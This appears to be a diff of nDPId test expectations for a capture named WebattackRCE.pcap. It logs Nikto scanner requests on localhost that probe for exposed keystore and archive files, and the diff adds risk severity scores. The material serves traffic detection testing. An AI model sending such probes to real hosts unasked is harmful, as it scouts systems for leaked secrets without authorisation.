 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277058,"pkt":"AAAAAAAAAAAAAAAACABFAADB8E5AAEAGS+Z\/AAABfwAAAcN+H5BxG8g961ERj4AYAED+tQAAAQEICp1m\/GqdZvxqR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277060,"pkt":"AAAAAAAAAAAAAAAACABFAADB8w9AAEAGSSV\/AAABfwAAAcOAH5AJpMt9MSZkIYAYAED+tQAAAQEICp1m\/GydZvxsR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277061,"pkt":"AAAAAAAAAAAAAAAACABFAADDv8dAAEAGfGt\/AAABfwAAAcOCH5BIh4e15F5tqYAYAED+twAAAQEICp1m\/G2dZvxtR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277063,"pkt":"AAAAAAAAAAAAAAAACABFAADDTFBAAEAG7+J\/AAABfwAAAcOEH5DLhXRAbe\/JloAYAED+twAAAQEICp1m\/G+dZvxvR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277064,"pkt":"AAAAAAAAAAAAAAAACABFAADCx41AAEAGdKZ\/AAABfwAAAcOGH5Ab+v\/67hwkoIAYAED+tgAAAQEICp1m\/HCdZvxwR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277066,"pkt":"AAAAAAAAAAAAAAAACABFAADC4+FAAEAGWFJ\/AAABfwAAAcOIH5A1wtuuFoHVMYAYAED+tgAAAQEICp1m\/HGdZvxxR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277067,"pkt":"AAAAAAAAAAAAAAAACABFAADCfFhAAEAGv9t\/AAABfwAAAcOKH5CRgEQl8Paa6IAYAED+tgAAAQEICp1m\/HOdZvxzR0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277070,"pkt":"AAAAAAAAAAAAAAAACABFAADCXGdAAEAG38x\/AAABfwAAAcOMH5AiiWQXZDyqFoAYAED+tgAAAQEICp1m\/HadZvx1R0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
